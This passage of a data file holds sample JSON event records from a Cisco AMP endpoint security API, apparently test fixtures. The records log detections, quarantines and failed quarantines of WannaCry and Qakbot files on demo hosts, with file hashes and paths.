ame":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 